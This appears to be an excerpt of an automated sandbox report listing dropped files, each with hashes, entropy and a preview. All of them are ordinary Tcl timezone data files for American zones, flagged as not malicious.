Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Montserrat) {. {-9223372036854775808 -14932 0 LMT}. {-1846266608 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Nassau Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8260
Entropy (8bit):	3.7353311910027376
Encrypted:	false
SSDEEP:	96:JUzoaC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:Gzorn+qvOTFhPI1jFIL
MD5:	6F9F530A792FC34E2B0CEE4BC3DB3809
SHA1:	4DF8A4A6993E47DD5A710BEE921D88FEF44858E7
SHA-256:	9F62117DDA0A21D37B63C9083B3C50572399B22D640262F427D68123078B32F9
SHA-512:	C2BF93FDBE8430113FA63561D1A08145DCF31CD679AB7230098993C7A19EF0F29F486C962656F8A62505CB1BFE993FBD3BB5FB0BAE7B6E7E190DE2865C445408
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Nassau) {. {-9223372036854775808 -18570 0 LMT}. {-1825095030 -18000 0 EST}. {-179341200 -14400 1 EDT}. {-163620000 -18000 0 EST}. {-147891600 -14400 1 EDT}. {-131565600 -18000 0 EST}. {-116442000 -14400 1 EDT}. {-100116000 -18000 0 EST}. {-84387600 -14400 1 EDT}. {-68666400 -18000 0 EST}. {-52938000 -14400 1 EDT}. {-37216800 -18000 0 EST}. {-21488400 -14400 1 EDT}. {-5767200 -18000 0 EST}. {9961200 -14400 1 EDT}. {25682400 -18000 0 EST}. {41410800 -14400 1 EDT}. {57736800 -18000 0 EST}. {73465200 -14400 1 EDT}. {89186400 -18000 0 EST}. {104914800 -14400 1 EDT}. {120636000 -18000 0 EST}. {136364400 -14400 1 EDT}. {152085600 -18000 0 EST}. {167814000 -14400 1 EDT}. {183535200 -18000 0 EST}. {189320400 -18000 0 EST}. {199263600 -14400 1 EDT}. {215589600 -18000 0 EST}. {230713200 -14400 1 EDT}. {247039200 -18000 0 EST}. {262767600

C:\Users\user\Desktop\tcl\tzdata\America\New_York Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11004
Entropy (8bit):	3.725417189649631
Encrypted:	false
SSDEEP:	96:iNXYUiZrbgZ8UMr5UwdaC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:23iZrbgZ8UMr2wdrn+qvOTFhPI1jFIL
MD5:	C9D78AB6CF796A9D504BE2903F00B49C
SHA1:	A6C0E4135986A1A6F36B62276BFAB396DA1A4A9B
SHA-256:	1AB6E47D96BC34F57D56B936233F58B5C748B65E06AFF6449C3E3C317E411EFE
SHA-512:	6D20B13F337734CB58198396477B7C0E9CB89ED4D7AB328C22A4A528CAF187D10F42540DBB4514A0C139E6F4AE9A1A71AED02E3735D1D4F12C5314014C0C1EB6
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/New_York) {. {-9223372036854775808 -17762 0 LMT}. {-2717650800 -18000 0 EST}. {-1633280400 -14400 1 EDT}. {-1615140000 -18000 0 EST}. {-1601830800 -14400 1 EDT}. {-1583690400 -18000 0 EST}. {-1577905200 -18000 0 EST}. {-1570381200 -14400 1 EDT}. {-1551636000 -18000 0 EST}. {-1536512400 -14400 1 EDT}. {-1523210400 -18000 0 EST}. {-1504458000 -14400 1 EDT}. {-1491760800 -18000 0 EST}. {-1473008400 -14400 1 EDT}. {-1459706400 -18000 0 EST}. {-1441558800 -14400 1 EDT}. {-1428256800 -18000 0 EST}. {-1410109200 -14400 1 EDT}. {-1396807200 -18000 0 EST}. {-1378659600 -14400 1 EDT}. {-1365357600 -18000 0 EST}. {-1347210000 -14400 1 EDT}. {-1333908000 -18000 0 EST}. {-1315155600 -14400 1 EDT}. {-1301853600 -18000 0 EST}. {-1283706000 -14400 1 EDT}. {-1270404000 -18000 0 EST}. {-1252256400 -14400 1 EDT}. {-1238954400 -18000 0 EST}. {-122080680

C:\Users\user\Desktop\tcl\tzdata\America\Nipigon Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7836
Entropy (8bit):	3.7462966187089535
Encrypted:	false
SSDEEP:	96:rEa2raC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:rYrrn+qvOTFhPI1jFIL
MD5:	3D389AA51D3E29E8A1E8ED07646AA0DD
SHA1:	2E3DF9406B14662ADEDDC0F891CD81DF23D98157
SHA-256:	3A0FB897E5CCB31B139E009B909053DCE36BB5791ACF23529D874AFA9F0BB405
SHA-512:	AFF7B30355ECB6EBD43D1E6C943C250AB98CC82BDC8DDC7595769E4CE188A23591AEFCF18A028CC6479CF6AA20F65980E37C74F6CEE907537366136FAF29B66E
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Nipigon) {. {-9223372036854775808 -21184 0 LMT}. {-2366734016 -18000 0 EST}. {-1632070800 -14400 1 EDT}. {-1615140000 -18000 0 EST}. {-923252400 -14400 1 EDT}. {-880218000 -14400 0 EWT}. {-769395600 -14400 1 EPT}. {-765396000 -18000 0 EST}. {136364400 -14400 1 EDT}. {152085600 -18000 0 EST}. {167814000 -14400 1 EDT}. {183535200 -18000 0 EST}. {199263600 -14400 1 EDT}. {215589600 -18000 0 EST}. {230713200 -14400 1 EDT}. {247039200 -18000 0 EST}. {262767600 -14400 1 EDT}. {278488800 -18000 0 EST}. {294217200 -14400 1 EDT}. {309938400 -18000 0 EST}. {325666800 -14400 1 EDT}. {341388000 -18000 0 EST}. {357116400 -14400 1 EDT}. {372837600 -18000 0 EST}. {388566000 -14400 1 EDT}. {404892000 -18000 0 EST}. {420015600 -14400 1 EDT}. {436341600 -18000 0 EST}. {452070000 -14400 1 EDT}. {467791200 -18000 0 EST}. {483519600 -14400 1 EDT}.

C:\Users\user\Desktop\tcl\tzdata\America\Nome Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8404
Entropy (8bit):	3.8859165156616937
Encrypted:	false
SSDEEP:	96:OMmWQm825s/Q7Ddh5sBPyNsSLFOMM/EowALVZVmWa86Eac8rQ:OMmWQmI/4h5sBPy+CMt/ElALLVuAH
MD5:	ECBBCB3C63125333C1339EFF2C02BACE
SHA1:	293B8D9314F57F54A7C0457C0C661A5DB2EFE026
SHA-256:	9739527976A9FF2753C1D986C3901F9A537E1F9387BE2543BB00257DD9D8881A
SHA-512:	AB22FC48ABC2B773522F37B929961774B80B1EF4CE76837AEDB1E6640DEB4D8C46CE89E3A24854F2D684579EB1BD9790AF9EBDFF3556A621ECB2AF66F32EC256
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Nome) {. {-9223372036854775808 46701 0 LMT}. {-3225358701 -39698 0 LMT}. {-2188947502 -39600 0 NST}. {-883573200 -39600 0 NST}. {-880196400 -36000 1 NWT}. {-769395600 -36000 1 NPT}. {-765374400 -39600 0 NST}. {-757342800 -39600 0 NST}. {-86878800 -39600 0 BST}. {-31496400 -39600 0 BST}. {-21466800 -36000 1 BDT}. {-5745600 -39600 0 BST}. {9982800 -36000 1 BDT}. {25704000 -39600 0 BST}. {41432400 -36000 1 BDT}. {57758400 -39600 0 BST}. {73486800 -36000 1 BDT}. {89208000 -39600 0 BST}. {104936400 -36000 1 BDT}. {120657600 -39600 0 BST}. {126709200 -36000 1 BDT}. {152107200 -39600 0 BST}. {162392400 -36000 1 BDT}. {183556800 -39600 0 BST}. {199285200 -36000 1 BDT}. {215611200 -39600 0 BST}. {230734800 -36000 1 BDT}. {247060800 -39600 0 BST}. {262789200 -36000 1 BDT}. {278510400 -39600 0 BST}. {294238800 -36000 1 BDT}. {309960000 -3

C:\Users\user\Desktop\tcl\tzdata\America\Noronha Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1368
Entropy (8bit):	4.01376478240381
Encrypted:	false
SSDEEP:	24:cQ8eHChYsS590B74LmCUGXx1bvzbsgEfKaccbMuSEh:5ghYsSDK74LmCUGB1bvzbsgEfK1couSK
MD5:	38D2ADBD4CC7A54D3EDDC120BE4E32E9
SHA1:	07AEFC41171850277C4ECF30B3C5108ED196926D
SHA-256:	03C9461769527F6D7639E79CBACB71452B01BA08172D1105D2AC36458622F0D7
SHA-512:	F6FBE1E1AB9D66A12DEEAC6FA5536B0ACFC9F777D5E270B05BD3144B1065AE02BEC157A57686F5EDA443498BA1B01B9F445C902ADCB33412FE73036AD3B29CFE
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Noronha) {. {-9223372036854775808 -7780 0 LMT}. {-1767217820 -7200 0 FNT}. {-1206961200 -3600 1 FNST}. {-1191366000 -7200 0 FNT}. {-1175378400 -3600 1 FNST}. {-1159830000 -7200 0 FNT}. {-633823200 -3600 1 FNST}. {-622072800 -7200 0 FNT}. {-602287200 -3600 1 FNST}. {-591836400 -7200 0 FNT}. {-570751200 -3600 1 FNST}. {-560214000 -7200 0 FNT}. {-539128800 -3600 1 FNST}. {-531356400 -7200 0 FNT}. {-191368800 -3600 1 FNST}. {-184201200 -7200 0 FNT}. {-155167200 -3600 1 FNST}. {-150073200 -7200 0 FNT}. {-128901600 -3600 1 FNST}. {-121129200 -7200 0 FNT}. {-99957600 -3600 1 FNST}. {-89593200 -7200 0 FNT}. {-68421600 -3600 1 FNST}. {-57970800 -7200 0 FNT}. {499744800 -3600 1 FNST}. {511232400 -7200 0 FNT}. {530589600 -3600 1 FNST}. {540262800 -7200 0 FNT}. {562125600 -3600 1 FNST}. {571194000 -7200 0 FNT}. {592970400 -3600 1 FNST}. {6

C:\Users\user\Desktop\tcl\tzdata\America\North_Dakota\Beulah Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8278
Entropy (8bit):	3.7975723806562063
Encrypted:	false
SSDEEP:	192:raF2dVtXwDTIRqfhXbdXvDXpVXVto//q7u379zlq3LtVBaANIsrXHEK5Dac5TE35:OFcVtXwDTIRqfh57Tlto//q7u379zlqw
MD5:	15AABAE9ABE4AF7ABEADF24A510E9583
SHA1:	3DEF11310D02F0492DF09591A039F46A8A72D086
SHA-256:	B328CC893D217C4FB6C84AA998009940BFBAE240F944F40E7EB900DEF1C7A5CF
SHA-512:	7A12A25EB6D6202C47CFDD9F3CE71342406F0EDA3D1D68B842BCFE97EFF1F2E0C11AD34D4EE0A61DF7E0C7E8F400C8CCA73230BDB3C677F8D15CE5CBA44775D7
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/North_Dakota/Beulah) {. {-9223372036854775808 -24427 0 LMT}. {-2717643600 -25200 0 MST}. {-1633273200 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1601823600 -21600 1 MDT}. {-1583683200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-52930800 -21600 1 MDT}. {-37209600 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {9968400 -21600 1 MDT}. {25689600 -25200 0 MST}. {41418000 -21600 1 MDT}. {57744000 -25200 0 MST}. {73472400 -21600 1 MDT}. {89193600 -25200 0 MST}. {104922000 -21600 1 MDT}. {120643200 -25200 0 MST}. {126694800 -21600 1 MDT}. {152092800 -25200 0 MST}. {162378000 -21600 1 MDT}. {183542400 -25200 0 MST}. {199270800 -21600 1 MDT}. {215596800 -25200 0 MST}. {230720400 -21600 1 MDT}. {247046400 -25200 0 MS

C:\Users\user\Desktop\tcl\tzdata\America\North_Dakota\Center Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8278
Entropy (8bit):	3.7834920003907664
Encrypted:	false
SSDEEP:	192:LF2dK7X0N41+IestuNEbYkzbXwDTIRqfhXbdXvDXpVXVto//q7u379zlq3LtVBaT:LFcK7X0N41+IestuNEbYkzbXwDTIRqfK
MD5:	AC804124F4CE4626F5C1FDA2BC043011
SHA1:	4B3E8CC90671BA543112CEE1AB5450C6EA4615DF
SHA-256:	E90121F7D275FDCC7B8DCDEC5F8311194D432510FEF5F5F0D6F211A4AACB78EF
SHA-512:	056EF65693C16CB58EC5A223528C636346DB37B75000397D03663925545979792BBC50B20B5AA20139ECE9A9D6B73DA80C2319AA4F0609D6FC1A6D30D0567C58
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/North_Dakota/Center) {. {-9223372036854775808 -24312 0 LMT}. {-2717643600 -25200 0 MST}. {-1633273200 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1601823600 -21600 1 MDT}. {-1583683200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-52930800 -21600 1 MDT}. {-37209600 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {9968400 -21600 1 MDT}. {25689600 -25200 0 MST}. {41418000 -21600 1 MDT}. {57744000 -25200 0 MST}. {73472400 -21600 1 MDT}. {89193600 -25200 0 MST}. {104922000 -21600 1 MDT}. {120643200 -25200 0 MST}. {126694800 -21600 1 MDT}. {152092800 -25200 0 MST}. {162378000 -21600 1 MDT}. {183542400 -25200 0 MST}. {199270800 -21600 1 MDT}. {215596800 -25200 0 MST}. {230720400 -21600 1 MDT}. {247046400 -25200 0 MS

C:\Users\user\Desktop\tcl\tzdata\America\North_Dakota\New_Salem Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8281
Entropy (8bit):	3.795939700557522
Encrypted:	false
SSDEEP:	192:uF2dyuNEbYkzbXwDTIRqfhXbdXvDXpVXVto//q7u379zlq3LtVBaANIsrXHEK5Da:uFcyuNEbYkzbXwDTIRqfh57Tlto//q7k
MD5:	E26FC508DFD73B610C5543487C763FF5
SHA1:	8FBDE67AF561037AAA2EDF93E9456C7E534F4B5A
SHA-256:	387D3C57EDE8CCAAD0655F19B35BC0D124C016D16F06B6F2498C1151E4792778
SHA-512:	8A10B7370D1521EDF18AB4D5192C930ABC68AB9AE718ADF3D175EACE9A1F5DAC690A76B02EFB4059374761962D8C2660497F8E951DFE9812FB3CFCFDF9165E45
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/North_Dakota/New_Salem) {. {-9223372036854775808 -24339 0 LMT}. {-2717643600 -25200 0 MST}. {-1633273200 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1601823600 -21600 1 MDT}. {-1583683200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-52930800 -21600 1 MDT}. {-37209600 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {9968400 -21600 1 MDT}. {25689600 -25200 0 MST}. {41418000 -21600 1 MDT}. {57744000 -25200 0 MST}. {73472400 -21600 1 MDT}. {89193600 -25200 0 MST}. {104922000 -21600 1 MDT}. {120643200 -25200 0 MST}. {126694800 -21600 1 MDT}. {152092800 -25200 0 MST}. {162378000 -21600 1 MDT}. {183542400 -25200 0 MST}. {199270800 -21600 1 MDT}. {215596800 -25200 0 MST}. {230720400 -21600 1 MDT}. {247046400 -25200 0

C:\Users\user\Desktop\tcl\tzdata\America\Ojinaga Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6621
Entropy (8bit):	3.7945318113967823
Encrypted:	false
SSDEEP:	48:5gUFM/6M/Mp5tyTc8Ln4ypZ9giGuWGwZIoktiz+hL5Cw5feQ5BT5rBSNNOVQoh/5:KJNfzo+C2mWBNQMsmNTxf6AeO+cblX
MD5:	D88A28F381C79410D816F8D2D1610A02
SHA1:	81949A1CACD5907CA5A8649385C03813EEFCDDE0
SHA-256:	F65C0F8532387AFE703FACDEE325BF8D7F3D1232DEE92D65426FF917DD582CB3
SHA-512:	9A9B0C65ECDFF690EF2933B323B3A1CF2D67D0A43F285BB9FEEFF275316148A07F5AC044C48F64E3D8CFA7C1DE44AF220A6855DC01225F8BFFF63AEC946B944A
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Ojinaga) {. {-9223372036854775808 -25060 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {820476000 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {883634400 -21600 0 CST}. {891766800 -21600 0 MDT}. {909302400 -25200 0 MST}. {923216400 -21600 1 MDT}. {941356800 -25200 0 MST}. {954666000 -21600 1 MDT}. {972806400 -25200 0 MST}. {989139600 -21600 1 MDT}. {1001836800 -25200 0 MST}. {1018170000 -21600 1 MDT}. {1035705600 -25200 0 MST}. {1049619600 -21600 1 MDT}. {1067155200 -25200 0 MST}. {1081069200 -21600 1 MDT}. {1099209600 -25200 0 MST}. {1112518800 -21600 1 MDT}. {1130659200 -25200 0 MST}. {1143968400 -21600 1 MDT}. {1162108800 -2520

C:\Users\user\Desktop\tcl\tzdata\America\Panama Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	179
Entropy (8bit):	4.924365872261203
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGEu5fcXGm2OHGf8xYvX5BidhZSsc1HRX1vain:SlSWB9X5290WTm2OHDxYP5GhZE3X1iin
MD5:	771816CABF25492752C5DA76C5EF74A5
SHA1:	6494F467187F99C9A51AB670CD8DC35078D63904
SHA-256:	0E323D15EA84D4B6E838D5DCD99AEE68666AF97A770DA2AF84B7BDCA4AB1DBBA
SHA-512:	C32D918E121D800B9DFD5CE1F13A4BF2505C0EDCE0085639C8EDF48073E0888906F1A28EF375BDCF549DB14CD33F7C405E28BC35DDF22445C224FBC64146B4EC
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Panama) {. {-9223372036854775808 -19088 0 LMT}. {-2524502512 -19176 0 CMT}. {-1946918424 -18000 0 EST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Pangnirtung Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7484
Entropy (8bit):	3.7727467213469943
Encrypted:	false
SSDEEP:	192:72KFEUlpde9pXbO53or0gqvOTFhPI1jFIL:y0r3+
MD5:	E740F56827130C3B87CCB84D66AF0392
SHA1:	60830B872B23FB0E3231156FECCAB693D39AA6D8
SHA-256:	775289D3F8A386A22F920BB48476681D4AC3BCCFCC87F51601B29978D6A5D6B6
SHA-512:	16594FC519ADC3995015B16EB9C7C8E552430AE376DE2089F45E2360CC875A0FA0CE0DEDAD888E497E4A8C7CD495895ADEC522F18DA85A1F264373A441AFFD9C
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Pangnirtung) {. {-9223372036854775808 0 0 zzz}. {-1546300800 -14400 0 AST}. {-880221600 -10800 1 AWT}. {-769395600 -10800 1 APT}. {-765399600 -14400 0 AST}. {-147902400 -7200 1 ADDT}. {-131572800 -14400 0 AST}. {325663200 -10800 1 ADT}. {341384400 -14400 0 AST}. {357112800 -10800 1 ADT}. {372834000 -14400 0 AST}. {388562400 -10800 1 ADT}. {404888400 -14400 0 AST}. {420012000 -10800 1 ADT}. {436338000 -14400 0 AST}. {452066400 -10800 1 ADT}. {467787600 -14400 0 AST}. {483516000 -10800 1 ADT}. {499237200 -14400 0 AST}. {514965600 -10800 1 ADT}. {530686800 -14400 0 AST}. {544600800 -10800 1 ADT}. {562136400 -14400 0 AST}. {576050400 -10800 1 ADT}. {594190800 -14400 0 AST}. {607500000 -10800 1 ADT}. {625640400 -14400 0 AST}. {638949600 -10800 1 ADT}. {657090000 -14400 0 AST}. {671004000 -10800 1 ADT}. {688539600 -14400 0 AST}. {702

C:\Users\user\Desktop\tcl\tzdata\America\Paramaribo Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	272
Entropy (8bit):	4.78889293057406
Encrypted:	false
SSDEEP:	6:SlSWB9X5290oldJm2OHeke3FIMVTvVWKGOT/5g/VVFA:MBp5290olLmdHeV3qSvWOTc/q
MD5:	C8945B3FDD3BAAA0693870F3F85A1D38
SHA1:	A35CC1D2B8D3ABE8AF40F8530D62BB165B9E078F
SHA-256:	DF43D6E1F7F71D633C5112376B2E9FE089CDB7CB9876EAB5E38AF9B0772CBF6F
SHA-512:	AEAFA7561501C125C66F7710C7EBAFD9C56F4FF4B347D868D686A1877253DB074969FC531DF4E475A14DC91C15D39146718A8E5C86E4A2129C478BCF57137227
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Paramaribo) {. {-9223372036854775808 -13240 0 LMT}. {-1861906760 -13252 0 PMT}. {-1104524348 -13236 0 PMT}. {-765317964 -12600 0 NEGT}. {185686200 -12600 0 SRT}. {465449400 -10800 0 SRT}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Phoenix Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	479
Entropy (8bit):	4.379302206927978
Encrypted:	false
SSDEEP:	12:MBp5290OQmdH514YPFotFg4tFQxRgmjtFdRb2:cQCeksFsFgcFQxBhF7b2
MD5:	1B5C5CBC4168FCCC9100487D3145AF6D
SHA1:	6E9E3074B783108032469C8E601D2C63A573B840
SHA-256:	9E28F87C0D9EE6AD6791A220742C10C135448965E1F66A7EB04D6477D8FA11B0
SHA-512:	4A6527FF5C7F0A0FDC574629714399D9A475EDC1338BF4C9EEEEDCC8CA23E14D2DE4DCA421D46FABA813A65236CD7B8ADBE103B641A763C6BC508738BF73A58C
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Phoenix) {. {-9223372036854775808 -26898 0 LMT}. {-2717643600 -25200 0 MST}. {-1633273200 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1601823600 -21600 1 MDT}. {-1583683200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-820519140 -25200 0 MST}. {-796841940 -25200 0 MST}. {-94669200 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-56221200 -25200 0 MST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Port-au-Prince Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6458
Entropy (8bit):	3.7695898184176624
Encrypted:	false
SSDEEP:	48:5IV1C8phBVSWroLMEbF8xzqXtWl5Hm0RQU+5oaIOWIF4IPWFeB/5udPOcBqYZ4vX:mKXivOTFhP5S+ijFnRaJeaX1eyDt
MD5:	8580CED12AF23BF83DB337E314EE2B6E
SHA1:	333AB24A58F36B9526888BB4A3B8F5135373A62D
SHA-256:	34A7491EB4BDC94BF02D820E47FDE8AAF0D5037B2E71DD15E8FF61409321687E
SHA-512:	4CA6E99E2EDED083B8B543C9471DE61588BD894A2E4C4550D7F47E31824704CFB39B6BA8E1F1B5EEB5A1ABB2242AC2E7EFEFCFA36EBB60BB67BA0130DF7FCDE4
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Port-au-Prince) {. {-9223372036854775808 -17360 0 LMT}. {-2524504240 -17340 0 PPMT}. {-1670483460 -18000 0 EST}. {421218000 -14400 1 EDT}. {436334400 -18000 0 EST}. {452062800 -14400 1 EDT}. {467784000 -18000 0 EST}. {483512400 -14400 1 EDT}. {499233600 -18000 0 EST}. {514962000 -14400 1 EDT}. {530683200 -18000 0 EST}. {546411600 -14400 1 EDT}. {562132800 -18000 0 EST}. {576050400 -14400 1 EDT}. {594194400 -18000 0 EST}. {607500000 -14400 1 EDT}. {625644000 -18000 0 EST}. {638949600 -14400 1 EDT}. {657093600 -18000 0 EST}. {671004000 -14400 1 EDT}. {688543200 -18000 0 EST}. {702453600 -14400 1 EDT}. {719992800 -18000 0 EST}. {733903200 -14400 1 EDT}. {752047200 -18000 0 EST}. {765352800 -14400 1 EDT}. {783496800 -18000 0 EST}. {796802400 -14400 1 EDT}. {814946400 -18000 0 EST}. {828856800 -14400 1 EDT}. {846396000 -18000 0 EST}.

C:\Users\user\Desktop\tcl\tzdata\America\Port_of_Spain Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	155
Entropy (8bit):	5.077805073731929
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGEuPXGkXGm2OHUnvUdxKzVvwvYv:SlSWB9X5290eSm2OHkzVr
MD5:	8169D55899164E2168EF50E219115727
SHA1:	42848A510C120D4E834BE61FC76A1C539BA88C8A
SHA-256:	6C8718C65F99AB43377609705E773C93F7993FBB3B425E1989E8231308C475AF
SHA-512:	1590D42E88DD92542CADC022391C286842C156DA4795877EA67FEF045E0A831615C3935E08098DD71CF29C972EDC79084FFCC9AFAB7813AE74EEE14D6CFEFB9D
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Port_of_Spain) {. {-9223372036854775808 -14764 0 LMT}. {-1825098836 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Porto_Acre Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	196
Entropy (8bit):	4.818272118524638
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y7thtedVAIgpthKQ290msh490thB:MBaIMYdxpR290v490x
MD5:	1C0C736D0593654230FCBB0DC275313B
SHA1:	00518615F97BCFF2F6862116F4DF834B70E2D4CA
SHA-256:	5C97E6DF0FC03F13A0814274A9C3A983C474000AE3E78806B38DF9208372FD54
SHA-512:	2252D17CB4F770124586BBF35974077212B92C1587071C9F552F1EFAC15CBF92128E61C456F9F5154D212F7D66CC5BD85B76B1187D5A6F24E89E14EDF322D67F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Rio_Branco)]} {. LoadTimeZoneFile America/Rio_Branco.}.set TZData(:America/Porto_Acre) $TZData(:America/Rio_Branco).

C:\Users\user\Desktop\tcl\tzdata\America\Porto_Velho Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1030
Entropy (8bit):	4.067722644085682
Encrypted:	false
SSDEEP:	24:cQQe47o6Skl7s/oySklTs/oiSklP/otHSkl8/oNOSkll/osSklGo/ooSklR/o9SO:5P6SklVySklTpiSklo5Skl5oSklOsSkO
MD5:	CC959FB88D530F97BA9E62D17B7E5CB8
SHA1:	4BF557B361CDAB9257B111BE1C875FCEAA286FAD
SHA-256:	CA90E1529D142742367EC0728E45B5D601CDBEC591544E5C144A9A69A2FB6ACA
SHA-512:	28A28F01CD1211F73F1B1CF241D56EE5D6C92DF8319481D32BFE11FE87C778DC793A32378E5B6313731B2F206972A25356728C31F90F9583074D4DAEF27EECFD
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Porto_Velho) {. {-9223372036854775808 -15336 0 LMT}. {-1767210264 -14400 0 AMT}. {-1206954000 -10800 1 AMST}. {-1191358800 -14400 0 AMT}. {-1175371200 -10800 1 AMST}. {-1159822800 -14400 0 AMT}. {-633816000 -10800 1 AMST}. {-622065600 -14400 0 AMT}. {-602280000 -10800 1 AMST}. {-591829200 -14400 0 AMT}. {-570744000 -10800 1 AMST}. {-560206800 -14400 0 AMT}. {-539121600 -10800 1 AMST}. {-531349200 -14400 0 AMT}. {-191361600 -10800 1 AMST}. {-184194000 -14400 0 AMT}. {-155160000 -10800 1 AMST}. {-150066000 -14400 0 AMT}. {-128894400 -10800 1 AMST}. {-121122000 -14400 0 AMT}. {-99950400 -10800 1 AMST}. {-89586000 -14400 0 AMT}. {-68414400 -10800 1 AMST}. {-57963600 -14400 0 AMT}. {499752000 -10800 1 AMST}. {511239600 -14400 0 AMT}. {530596800 -10800 1 AMST}. {540270000 -14400 0 AMT}. {562132800 -10800 1 AMST}. {571201200 -14400 0 AMT}.

C:\Users\user\Desktop\tcl\tzdata\America\Puerto_Rico Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	273
Entropy (8bit):	4.728240676465187
Encrypted:	false
SSDEEP:	6:SlSWB9X5290pbm2OH9VPMGoeVVFrZVVFUFkeF3k/eJpR/r:MBp5290lmdHvPMpe/ZZ/uFkeF3k/eJ/D
MD5:	2FB893819124F19A7068F802D6A59357
SHA1:	6B35C198F74FF5880714A3182407858193CE37A4
SHA-256:	F05530CFBCE7242847BE265C2D26C8B95B00D927817B050A523FFB139991B09E
SHA-512:	80739F431F6B3548EFD4F70FE3630F66F70CB29B66845B8072D26393ADD7DAB22675BE6DA5FBDC7561D4F3F214816AAD778B6CD0EE45264B4D6FFA48B3AC7C43
Malicious:	false
